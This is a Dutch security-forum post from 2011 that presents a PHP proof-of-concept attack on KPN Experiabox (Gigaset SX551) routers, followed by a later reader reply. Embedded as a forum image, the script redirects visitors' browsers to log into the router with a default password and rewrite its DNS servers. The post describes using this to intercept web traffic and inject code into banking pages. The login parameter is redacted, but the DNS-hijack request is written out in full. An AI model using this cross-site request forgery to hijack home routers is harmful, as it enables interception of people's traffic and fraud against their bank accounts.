Security Professionals - ipfw add deny all from eindgebruikers to any

Remote SX551 WLAN dsl (Experiabox) Hack - KPN router : pwnage

16-04-2011, 16:13 door Anoniem, 2 reacties
D.m.v. de onderstaande script, BeEFYPROXY (M.I.T.M) en een PHP based DNS server bijvoorbeeld getweakte http://www.php.net/manual/de/function.socket-recvfrom.php#70063

Zou je gemakkelijk de DNS servers van Siemens routers (Experiabox) van KPN kunnen overschrijven.

Je kunt dan zonder een "trojan" te installeren de DNS servers kunnen kapen en de web verkeer HTTP(S) kunnen aftappen tot dat ze de router resetten of handmatig de DNS settings herstellen :)

De onderstaande PHP code zal NIET werken omdat de auth gedeelte is bewerkt om misbruik tegen te gaan.

Omdat dit niet OS gericht is maar via de interne LAN pc de router aanvalt zal het werken voor elke OS, dus ook voor de linux liefhebbers

Op de zelfde manier zou je vrijwel de meeste routers kunnen "hacken" d.m.v. een richtexted mail (html formaat) en/of met een beetje creativiteit de firmware kunnen overschijven.

Ook is webinjecting zeer gemakkelijk uit te voeren (bijvoorbeeld javascript injecten of HTML code wegschrabben om automatische bank transacties mogelijk te maken).

Ik raad iedereen aan om de default router password te wijzigen en de firmware te updaten.

<?php
/* Quick and dirty GigaSet SX551 WLAN dsl Hack (Experiabox) PoC - msn contact: mossad@hotmail.nl */

/*
usage:

1. Add image (<img src="..."> [img]...[/img]) to a forum with link: http://yourhosting.com/thisfile.php?551 for auth. login
2. Add image (<img src="..."> [img]...[/img]) to a forum with link: http://yourhosting.com/thisfile.php for hijacking dns

*/

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$dns1 = "12.34.56.78"; //preferred_dns_server default:195.121.1.34
$dns2 = "0.0.0.0"; //alternate_dns_server default:195.121.1.66

if(strstr($hostname,".direct-adsl.nl"))
{
if(isset($_GET['551']))
{
//Login with default password:
//this won't work! because I edited the URI, if you replace the XXXXX part with the right variable name it will work
header("Location: http://192.168.2.1/cgi-bin/login.exe?XXXXXXXXXXXXX=admin");
}else{
//Hijack DNS
$dns1_array = explode(".", $dns1);
$dns2_array = explode(".", $dns2);

header("Location: http://192.168.2.1/cgi-bin/setup_dns.exe?use_custom_dns_servers=enabled&preferred_dns_server_1=$dns1_array[0]&preferred_dns_server_2=$dns1_array[1]&preferred_dns_server_3=$dns1_array[2]&preferred_dns_server_4=$dns1_array[3]&alternate_dns_server_1=$dns2_array[0]&alternate_dns_server_2=$dns2_array[1]&alternate_dns_server_3=$dns2_array[2]&alternate_dns_server_4=$dns2_array[3]");
}
}else{
//What else ?? Displaying picture ?
header("Location: http://security.nl/images/securityheader_01.png");
}

?>
Reacties (2)
31-07-2013, 12:36 door Anoniem
Beste lezer,

Ik ben van mening dat mijn router experia sx551 gehackt is hij heeft voor zover ik weet nooit een firmware update gehad.

Ik weet dat er zijn privé gegevens naar elders zijn door gesluisd en op geslagen maar weet niet waar naartoe.

Dit meen ik te weten omdat er gegevens over langere tijd bij mijn dagelijkse contacten bekend zijn.

Mijn vraag is of het voor mij te achterhalen is waar deze gegevens naar toe zijn gesluisd.( ik denk aan minimaal een dns hack)

Is de router op een of andere manier uit te lezen om er achter te komen waar mijn gevens terecht gekomen zijn?

Ik zoek een bedrijf of particulier die me hierbij kan helpen ik woon zelf in midden limburg.
31-07-2013, 12:53 door [Account Verwijderd]
[Verwijderd]
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.